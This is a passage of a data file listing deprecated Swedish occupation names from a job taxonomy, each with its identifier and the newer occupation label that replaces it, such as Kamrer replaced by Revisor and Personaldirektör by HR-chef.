'taxonomy/definition': 'Granskningsman', 'taxonomy/preferred-label': 'Granskningsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7rct_y2Q_NSe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Revisionsbiträde', 'taxonomy/preferred-label': 'Revisionsbiträde',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Bbpr_AMz_nzt', 'taxonomy/definition': 'Revisorsassistent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Revisorsassistent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'mNBw_Znj_4eJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kamrer', 'taxonomy/preferred-label': 'Kamrer',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Ffsi_TDN_PDF', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Maskinbokförare', 'taxonomy/preferred-label': 'Maskinbokförare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'HeRm_ChB_HVB', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Redovisningsman', 'taxonomy/preferred-label': 'Redovisningsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'CeoS_Wzo_uz5', 'taxonomy/definition': 'Redovisningskonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redovisningskonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kf7K_UAZ_ed8', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Badbevakare', 'taxonomy/preferred-label': 'Badbevakare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YXm8_rp9_1Sv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Simhallsvakt', 'taxonomy/preferred-label': 'Simhallsvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'wFPP_zmg_PK4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Strandvakt', 'taxonomy/preferred-label': 'Strandvakt',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [{'taxonomy/id': 'BbNn_Gtf_rKp',
'taxonomy/definition': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Badmästare/Badbevakare/Badvakt/Simhallsvakt/Strandvakt'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'dunj_FU3_Fx5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Artistbokare', 'taxonomy/preferred-label': 'Artistbokare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '2LBV_CoV_iEf', 'taxonomy/definition': 'Artistagent/Artistbokare/Artistförmedlare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Artistagent/Artistbokare/Artistförmedlare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'GGA1_QkE_XgN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Avlöningskontorist', 'taxonomy/preferred-label': 'Avlöningskontorist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nRLP_eqC_ow9', 'taxonomy/definition': 'Löneadministratör/Lönekonsult',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Löneadministratör/Lönekonsult'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'R33K_7kd_PPT', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Löneassistent/Lönekontorist',
'taxonomy/preferred-label': 'Löneassistent/Lönekontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'nRLP_eqC_ow9', 'taxonomy/definition': 'Löneadministratör/Lönekonsult',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Löneadministratör/Lönekonsult'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'DCMR_H5T_4Nk', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Språkforskare', 'taxonomy/preferred-label': 'Språkforskare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'WrM5_fTS_37j', 'taxonomy/definition': 'Forskare, språk',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Forskare, språk'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Cq7H_YYS_aQH', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Ekonometriker', 'taxonomy/preferred-label': 'Ekonometriker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'ef1m_sEu_ok6', 'taxonomy/definition': 'Nationalekonom', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Nationalekonom'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'LCCW_oaP_6kn', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Taltidningsredaktör',
'taxonomy/preferred-label': 'Taltidningsredaktör', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'GFu2_s4q_9sr', 'taxonomy/definition': 'Redaktör',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Redaktör'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'VtTs_Y26_KMJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sångare, klassisk musik',
'taxonomy/preferred-label': 'Sångare, klassisk musik', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'k3ZW_16R_riY', 'taxonomy/definition': 'Sångare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Sångare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'zHkF_Yg1_PTS', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Skoldirektör', 'taxonomy/preferred-label': 'Skoldirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'j6P1_gJq_a2Q', 'taxonomy/definition': 'Skolchef/Skoldirektör/Skolledare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Skolchef/Skoldirektör/Skolledare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'hJuL_n8p_UEM', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Idrottspedagog', 'taxonomy/preferred-label': 'Idrottspedagog',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'M7TY_sct_XPk', 'taxonomy/definition': 'Idrottskonsulent',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Idrottskonsulent'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NNtF_PrM_erv', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjukhusingenjör', 'taxonomy/preferred-label': 'Sjukhusingenjör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nGhq_Pjm_az5', 'taxonomy/definition': 'Medicinteknisk ingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Medicinteknisk ingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'UFCb_3sj_MET', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Sjukhustekniker', 'taxonomy/preferred-label': 'Sjukhustekniker',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'nGhq_Pjm_az5', 'taxonomy/definition': 'Medicinteknisk ingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Medicinteknisk ingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4zNH_ukk_cEn', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Dispatcher', 'taxonomy/preferred-label': 'Dispatcher',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KQty_E1u_cia', 'taxonomy/definition': 'Helpdesktekniker/Supporttekniker',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Helpdesktekniker/Supporttekniker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '3vQv_E4Q_wjK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Trafikpedagog', 'taxonomy/preferred-label': 'Trafikpedagog',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'hERw_LKk_uJK', 'taxonomy/definition': 'Trafiklärare', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Trafiklärare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '46tq_qty_Lqm', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Entertainer', 'taxonomy/preferred-label': 'Entertainer',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'RsYS_Mkj_kd1', 'taxonomy/definition': 'Showartist', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Showartist'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'X4cv_VTi_Muz', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Driftkopplingstekniker',
'taxonomy/preferred-label': 'Driftkopplingstekniker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'UtA2_od9_3WT', 'taxonomy/definition': 'Elektriker, film/Elektriker, TV',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Elektriker, film/Elektriker, TV'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'EEN6_NCm_XgJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Laboratorietandtekniker',
'taxonomy/preferred-label': 'Laboratorietandtekniker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '9fEz_9ji_74Y', 'taxonomy/definition': 'Tandtekniker',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Tandtekniker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'kZAz_CaQ_zhN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kommunjurist', 'taxonomy/preferred-label': 'Kommunjurist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iRUx_bBB_Vmp', 'taxonomy/definition': 'Stadsjurist/Kommunjurist/Stadsadvokat',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Stadsjurist/Kommunjurist/Stadsadvokat'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Cbq1_SZq_WQJ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsadvokat', 'taxonomy/preferred-label': 'Stadsadvokat',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iRUx_bBB_Vmp', 'taxonomy/definition': 'Stadsjurist/Kommunjurist/Stadsadvokat',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Stadsjurist/Kommunjurist/Stadsadvokat'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'etPa_VHn_mrt', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Stadsombudsman', 'taxonomy/preferred-label': 'Stadsombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '1hZc_5BC_K7q', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Anläggningsingenjör, elkraft',
'taxonomy/preferred-label': 'Anläggningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'g7UK_FUb_nxf', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Beräkningsingenjör, elkraft',
'taxonomy/preferred-label': 'Beräkningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'PMx8_n1G_fPx', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Besiktningsingenjör, elkraft',
'taxonomy/preferred-label': 'Besiktningsingenjör, elkraft', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': '7Yn2_NLJ_oa2', 'taxonomy/definition': 'Elkraftingenjör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Elkraftingenjör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'TppD_R5Y_kiG', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kvalitetsingenjör/-tekniker, elkraft',
'taxonomy/preferred-label': 'Kvalitetsingenjör/-tekniker, elkraft',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'iXyv_E2W_cqc', 'taxonomy/definition': 'Kontrollanläggningstekniker',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Kontrollanläggningstekniker'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'XN3S_vj8_8Wz', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Bössmakare', 'taxonomy/preferred-label': 'Bössmakare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'KiD2_B8H_U7U', 'taxonomy/definition': 'Vapentekniker', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Vapentekniker'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YHB5_wmX_UCt', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Juridisk ombudsman', 'taxonomy/preferred-label': 'Juridisk ombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Sdc8_zgb_WFe', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Teaterinspicient', 'taxonomy/preferred-label': 'Teaterinspicient',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Zjz2_R2c_ySs', 'taxonomy/definition': 'Inspicient', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inspicient'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NBpU_vTR_B6S', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'TV-inspicient', 'taxonomy/preferred-label': 'TV-inspicient',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Zjz2_R2c_ySs', 'taxonomy/definition': 'Inspicient', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inspicient'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'cCYi_JUn_K8P', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Jordbruksforskare', 'taxonomy/preferred-label': 'Jordbruksforskare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'oRBx_v9Q_vH2', 'taxonomy/definition': 'Forskare, jordbruk',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Forskare, jordbruk'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '5bp9_eBL_BPF', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Trädgårdsforskare', 'taxonomy/preferred-label': 'Trädgårdsforskare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'Co7T_yKa_Zb1', 'taxonomy/definition': 'Forskare, trädgårdsvetenskap',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Forskare, trädgårdsvetenskap'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'CWK4_8NM_4YY', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Bild- och reprografiker',
'taxonomy/preferred-label': 'Bild- och reprografiker', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'gUu8_FXb_qCv', 'taxonomy/definition': 'Prepressoperatör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Prepressoperatör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'mL3G_SKE_mab', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Desktopoperatör', 'taxonomy/preferred-label': 'Desktopoperatör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'gUu8_FXb_qCv', 'taxonomy/definition': 'Prepressoperatör',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Prepressoperatör'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AfoB_XP5_5Ak', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Originalmontör', 'taxonomy/preferred-label': 'Originalmontör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'SxqC_BSK_D3u', 'taxonomy/definition': 'Originalare/Final Art',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Originalare/Final Art'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'd2gz_es2_pX5', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kvalitetskoordinator',
'taxonomy/preferred-label': 'Kvalitetskoordinator', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'hQtr_vwy_MGb',
'taxonomy/definition': 'Kvalitetssamordnare/Kvalitetskoordinator',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Kvalitetssamordnare/Kvalitetskoordinator'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'E9Fm_7C2_uYU', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Kameraman, TV', 'taxonomy/preferred-label': 'Kameraman, TV',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'JfyC_gDr_U4e', 'taxonomy/definition': 'TV-fotograf', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'TV-fotograf'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '7pvW_ATp_bnx', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'TV-redigerare', 'taxonomy/preferred-label': 'TV-redigerare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'K1k3_ZHN_PTh', 'taxonomy/definition': 'Redigerare, rörlig bild',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redigerare, rörlig bild'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'N9fQ_uJ4_1vB', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Videoredigerare', 'taxonomy/preferred-label': 'Videoredigerare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'K1k3_ZHN_PTh', 'taxonomy/definition': 'Redigerare, rörlig bild',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Redigerare, rörlig bild'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'SR8Z_ESt_FfC', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Förbundskassör', 'taxonomy/preferred-label': 'Förbundskassör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'jwgi_jYc_iE9', 'taxonomy/definition': 'Revisor', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Revisor'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'yjaM_pAe_u9m', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Varuhuschef', 'taxonomy/preferred-label': 'Varuhuschef',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'WWVG_4sM_faC', 'taxonomy/definition': 'Butikschef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Butikschef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ssNi_aPV_7o3', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Assistent, bostadsförmedling',
'taxonomy/preferred-label': 'Assistent, bostadsförmedling', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'WL4K_4RF_NEJ', 'taxonomy/definition': 'Bostadsförmedlare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Bostadsförmedlare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '79uB_oJR_dSQ', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personaldirektör', 'taxonomy/preferred-label': 'Personaldirektör',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'y22E_Nz6_5VU', 'taxonomy/definition': 'HR-chef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-chef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'nSdx_qDe_vCh', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Personalintendent', 'taxonomy/preferred-label': 'Personalintendent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'y22E_Nz6_5VU', 'taxonomy/definition': 'HR-chef', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'HR-chef'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4xEL_DVf_rNV', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Abonnemangskontorist',
'taxonomy/preferred-label': 'Abonnemangskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [
{'taxonomy/id': 'aoUt_f9s_rAk', 'taxonomy/definition': 'Abonnemangsförsäljare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Abonnemangsförsäljare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'YrxV_b6A_Dav', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Annonssekreterare', 'taxonomy/preferred-label': 'Annonssekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'MegR_77J_CGU', 'taxonomy/definition': 'Annonsassistent/Annonssekreterare',
'taxonomy/type': 'occupation-name', 'taxonomy/preferred-label': 'Annonsassistent/Annonssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 't4QA_LXF_Z3T', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Beställningskontorist',
'taxonomy/preferred-label': 'Beställningskontorist', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'W8Kb_rxf_uRQ',
'taxonomy/definition': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'mXSF_yMY_ppH', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Försäljningssekreterare',
'taxonomy/preferred-label': 'Försäljningssekreterare', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': 'HFuj_YCt_Ymn',
'taxonomy/definition': 'Försäljningsassistent/Försäljningssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäljningsassistent/Försäljningssekreterare'}]},
'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '2YDV_mGq_LpN', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Inköpsassistent', 'taxonomy/preferred-label': 'Inköpsassistent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'W8Kb_rxf_uRQ', 'taxonomy/definition': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'ZyDH_2Xe_bfK', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Inköpskontorist', 'taxonomy/preferred-label': 'Inköpskontorist',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'W8Kb_rxf_uRQ', 'taxonomy/definition': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Inköpsassistent/Inköpskontorist/Inköpssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'NikA_KEh_Ky4', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Säljassistent', 'taxonomy/preferred-label': 'Säljassistent',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'HFuj_YCt_Ymn', 'taxonomy/definition': 'Försäljningsassistent/Försäljningssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäljningsassistent/Försäljningssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'AfxM_9dB_xbC', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Säljsekreterare', 'taxonomy/preferred-label': 'Säljsekreterare',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': 'HFuj_YCt_Ymn', 'taxonomy/definition': 'Försäljningsassistent/Försäljningssekreterare',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Försäljningsassistent/Försäljningssekreterare'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '33CY_8xp_U24', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Justitieombudsman', 'taxonomy/preferred-label': 'Justitieombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': '4pdy_hXe_krp', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Diskrimineringsombudsman',
'taxonomy/preferred-label': 'Diskrimineringsombudsman', 'taxonomy/deprecated': True,
'taxonomy/replaced-by': [{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman',
'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
{'taxonomy/concept': {'taxonomy/id': 'Qf5a_Awb_Xr1', 'taxonomy/type': 'occupation-name',
'taxonomy/definition': 'Konsumentombudsman', 'taxonomy/preferred-label': 'Konsumentombudsman',
'taxonomy/deprecated': True, 'taxonomy/replaced-by': [
{'taxonomy/id': '7YVF_kE4_aPm', 'taxonomy/definition': 'Ombudsman', 'taxonomy/type': 'occupation-name',
'taxonomy/preferred-label': 'Ombudsman'}]}, 'taxonomy/version': 2},
